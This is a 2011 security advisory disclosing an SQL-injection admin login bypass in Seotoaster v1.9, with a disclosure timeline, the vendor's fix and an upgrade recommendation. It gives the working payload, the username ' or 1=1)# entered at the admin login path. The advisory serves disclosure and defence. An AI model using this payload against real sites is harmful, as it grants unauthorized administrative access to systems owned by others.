Advisory: Seotoaster SQL-Injection Admin Login Bypass
Advisory ID: INFOSERVE-ADV2011-06
Author: Stefan Schurtz
Contact: [email protected]
Affected Software: Successfully tested on Seotoaster v.1.9
Vendor URL: http://www.seotoaster.com/
Vendor Status: fixed
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
http://<target>/seotoaster/go
User: ' or 1=1)#
PW: notimportant
Upgrade to the latest version
15-Nov-2011 - Secunia SVCRP ([email protected])
15-Dec-2011 - fixed by vendor
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt